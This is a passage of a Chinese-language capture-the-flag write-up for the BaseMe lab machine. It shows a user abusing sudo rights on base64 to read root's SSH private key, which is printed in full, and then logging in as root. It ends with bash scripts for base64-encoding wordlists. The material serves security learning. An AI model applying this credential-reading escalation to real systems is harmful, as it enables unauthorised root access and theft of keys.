\u5c1d\u8bd5\u4e00\u4e0b\u6628\u5929\u6ca1\u8bb0\u4f4f\u7684\u90a3\u4e2aCapabilities<\/code>\u6743\u9650\u67e5\u8be2\uff1a<\/p>\nlucas@baseme:~$ \/usr\/sbin\/getcap -r 2>\/dev\/null<\/code><\/pre>\n\u6ca1\u4e1c\u897f\uff0c\u53ea\u80fd\u8bfb\u53d6\u79c1\u94a5\u4e86\uff0c\u7136\u540essh\u767b\u5f55\uff1a<\/p>\n
lucas@baseme:~$ \/usr\/sbin\/getcap -r 2>\/dev\/null\nlucas@baseme:~$ base64 \/root\/.ssh\/id_rsa | base64 -d\nbase64: \/root\/.ssh\/id_rsa: Permission denied\nlucas@baseme:~$ sudo base64 \/root\/.ssh\/id_rsa | base64 -d\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw6MgMnxUy+W9oem0Uhr2cJiez37qVubRK9D4kdu7H5NQ\/Z0FFp2B\nIdV3wx9xDWAICJgtYQUvOV7KFNAWvEXTDdhBwdiUcWEJ4AOXK7+5v7x4b8vuG5zK0lTVxp\nDEBE8faPj3UaHsa1JUVaDngTIkCa6VBICvG0DCcfL8xHBpCSIfoHfpqmOpWT\/pWXvGI3tk\n\/Ku\/STY7Ay8HtSgoqCcf3F+lb9J9kwKhFg9eLO5QDuFujb1CN7gUy8xhgNanUViyCZRwn7\npx+DfU+nscSEfG1zgfgqn2hCbBYqaP0jBgWcVL6YoMiwCS3jhmeFG4C\/p51j3gI6b8yz9a\nS+DtdTpDwQAAA8D82\/wZ\/Nv8GQAAAAdzc2gtcnNhAAABAQDDoyAyfFTL5b2h6bRSGvZwmJ\n7PfupW5tEr0PiR27sfk1D9nQUWnYEh1XfDH3ENYAgImC1hBS85XsoU0Ba8RdMN2EHB2JRx\nYQngA5crv7m\/vHhvy+4bnMrSVNXGkMQETx9o+PdRoexrUlRVoOeBMiQJrpUEgK8bQMJx8v\nzEcGkJIh+gd+mqY6lZP+lZe8Yje2T8q79JNjsDLwe1KCioJx\/cX6Vv0n2TAqEWD14s7lAO\n4W6NvUI3uBTLzGGA1qdRWLIJlHCfunH4N9T6exxIR8bXOB+CqfaEJsFipo\/SMGBZxUvpig\nyLAJLeOGZ4UbgL+nnWPeAjpvzLP1pL4O11OkPBAAAAAwEAAQAAAQBIArRoQOGJh9AMWBS6\noBgUC+lw4Ptq710Q7sOAFMxE7BnEsFZeI62TgZqqpNkdHjr2xuT1ME5YpK5niMzFkkIEd5\nSEwK6rKRfUcB3lyZWaoMoIBJ1pZoY1c2qYw1KTb3hVUEbgsmRugIhwWGC+anFfavaJCMDr\nnCO2g8VMnT\/cTyAv\/Qmi8m868KNEzcuzGV5ozHl1XLffHM9R\/cqPPyAYaQIa9Z+kS6ou9R\niMTjTSxOPnfh286kgx0ry1se9BBlrEc5251R\/PRkEKYrMj3AIwI30qvYlAtNfcCFhoJXLq\nvWystPARwiUs7WYBUHRf6bPP\/pHTTvwwb2bs51ngImpdAAAAgDaWnQ7Lj7Vp+mTjhSu4oG\nptDHNd2uuqB1+CHRcaVutUmknxvxG3p957UbvNp6e0+ePKtAIakrzbpAo6u25poyWugAuz\nX2nQhqsQh6yrThDJlTiDMeV7JNGFbGOcanXXXHt3tjfyrS0+aM87WmwqNyh6nfgy1C5axR\nfKZG8ivz5iAAAAgQD83QmCIcbZaCOlGwgHGcuCUDcxGY1QlIRnbM5VAjimNezGFs9f0ExD\nSiTwFsmITP\/\/njsbRZP2laiKKO6j4yp5LpfgDB5QHs+g4nXvDn6ns64gCKo7tf2bPP8VCe\nFWyc2JyqREwE3WmyhkPlyr9xAZerZ+7Fz+NFueRYzDklWg8wAAAIEAxhBeLqbo6\/GUKXF5\nrFRatLXI43Jrd9pyvLx62KghsnEBEk7my9sbU5dvYBLztS+lfPCRxV2ZzpjYdN4SDJbXIR\ntxBaLJe3c4uIc9WjyxGwUK9IL65rSrRVERHsTO525ofPWGQEa2A+pRCpz3A4Y41fy8Y9an\n2B2NmfTAfEkWFXsAAAALcm9vdEBiYXNlbWU=\n-----END OPENSSH PRIVATE KEY-----\nlucas@baseme:~$ cd \/tmp\nlucas@baseme:\/tmp$ vim id_rsa\n-bash: vim: command not found\nlucas@baseme:\/tmp$ vi id_rsa\nlucas@baseme:\/tmp$ chmod 600 id_rsa\nlucas@baseme:\/tmp$ ssh root@172.20.10.3 -i id_rsa\nThe authenticity of host '172.20.10.3 (172.20.10.3)' can't be established.\nECDSA key fingerprint is SHA256:Hlyr217g0zTkGOpiqimkeklOhJ4kYRLtHyEh0IgMEbM.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added '172.20.10.3' (ECDSA) to the list of known hosts.\nLinux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Sep 28 12:47:13 2020 from 192.168.1.59\nroot@baseme:~# cd \/root\nroot@baseme:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Sep 28 2020 .\ndrwxr-xr-x 18 root root 4096 Sep 28 2020 ..\n-rw------- 1 root root 80 Sep 28 2020 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Sep 28 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 1678 Sep 28 2020 root.txt\ndrwx------ 2 root root 4096 Sep 28 2020 .ssh\nroot@baseme:~# cat .bash_history \npasswd\nls -la\nrm .bash_history\ncd ~\nls -la\nrm .bash_history\n\/usr\/sbin\/poweroff \nroot@baseme:~# file \/usr\/sbin\/poweroff\n\/usr\/sbin\/poweroff: symbolic link to \/bin\/systemctl<\/code><\/pre>\n\u62ff\u5230rootshell\uff01\uff01\uff01\uff01<\/p>\n
\u989d\u5916\u6536\u83b7<\/h2>\nbase64\u52a0\u5bc6\u5b57\u5178<\/h3>\n
\u8fd9\u5757\u5f88\u7b80\u5355\uff0c\u5404\u4f4d\u5e08\u5085\u5927\u5c55\u8eab\u624b\uff0c\u9664\u4e86\u4e0a\u9762\u7684\u65b9\u6cd5\u5916\uff0c\u8fd8\u6709\u5e08\u5085\u7684\u89e3\u51b3\u65b9\u6cd5\u4e5f\u5f88\u4f18\u7f8e\uff0c\u8fd9\u91cc\u8bb0\u5f55\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n
https:\/\/kaianperez.github.io\/baseme\/#reconocimiento-de-puertos<\/a><\/p>\n#!\/bin\/bash\n\nwhile IFS= read -r linea\ndo\n echo $linea | base64 >> $2\ndone < $1<\/code><\/pre>\n\nIFS= read -r linea<\/code> \u8bfb\u53d6\u6bcf\u4e00\u884c\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u53d8\u91cf linea<\/code> \u4e2d\u3002IFS=<\/code> \u662f\u4e3a\u4e86\u786e\u4fdd\u4e0d\u4f1a\u53bb\u9664\u4efb\u4f55\u524d\u5bfc\u6216\u5c3e\u968f\u7684\u7a7a\u767d\u5b57\u7b26\uff08\u5305\u62ec\u7a7a\u683c\u3001\u5236\u8868\u7b26\u6216\u6362\u884c\u7b26\uff09\uff0cread -r<\/code> \u5219\u786e\u4fdd\u4e0d\u4f1a\u89e3\u91ca\u4efb\u4f55\u53cd\u659c\u6760\u5b57\u7b26\u4e3a\u8f6c\u4e49\u5b57\u7b26\u3002<\/li>\n<\/ul>\nhttps:\/\/migue27au.github.io\/C1b3r_F0lio\/challenges\/baseme.html<\/a><\/p>\n!\/bin\/bash\n\nfile=$1\nfile2=$2\nlines=$(wc $file -l | cut -d ' ' -f 1)\ntouch file2\n\nfor ((c=0; c<=$lines; c++)); do\n line=$(cat $file | head -n $c | tail -n 1)\n b64=$(echo $line | base64)\n\n echo $b64 >> $file2\ndon<\/code><\/pre>\n\nlines=$(wc $file -l | cut -d ' ' -f 1)<\/code>\uff1a\u8fd9\u884c\u4ee3\u7801\u8ba1\u7b97$file<\/code>\u6587\u4ef6\u7684\u884c\u6570\uff0c\u5e76\u5b58\u50a8\u5728\u53d8\u91cflines<\/code>\u4e2d\u3002wc -l<\/code>\u547d\u4ee4\u8ba1\u7b97\u884c\u6570\uff0ccut -d ' ' -f 1<\/code>\u4ece\u8f93\u51fa\u4e2d\u63d0\u53d6\u6570\u5b57\u3002<\/li>\nfor ((c=0; c<=$lines; c++)); do<\/code>\uff1a\u8fd9\u4e2a\u5faa\u73af\u4ece0\u5f00\u59cb\uff0c\u76f4\u5230$lines<\/code>\uff08\u5305\u542b\uff09\u3002\u7531\u4e8e\u6587\u4ef6\u884c\u6570\u662f\u4ece1\u5f00\u59cb\u8ba1\u6570\u7684\uff0c\u8fd9\u91cc\u5b9e\u9645\u4e0a\u4f1a\u591a\u6267\u884c\u4e00\u6b21\u5faa\u73af\uff0c\u5bfc\u81f4\u8bfb\u53d6\u6587\u4ef6\u7684\u6700\u540e\u4e00\u884c\u4e4b\u540e\u6ca1\u6709\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4tail -n 1<\/code>\u8f93\u51fa\u4e00\u4e2a\u7a7a\u884c\uff0c\u5e76\u5bf9\u5176\u8fdb\u884cBase64\u7f16\u7801\u3002<\/li>\n<\/ul>\n
![\"image-20240412114218886\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313184.png\")
<\/div><\/p>\n![\"image-20240412114414852\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313185.png\")
<\/div><\/p>\n![\"image-20240412114536250\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313186.png\")
<\/div><\/p>\n![\"image-20240412130003537\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313187.png\")
<\/div><\/p>\n![\"image-20240412130530535\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313188.png\")
<\/div><\/p>\n![\"image-20240412120058819\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121313189.png\")
<\/div><\/p>\n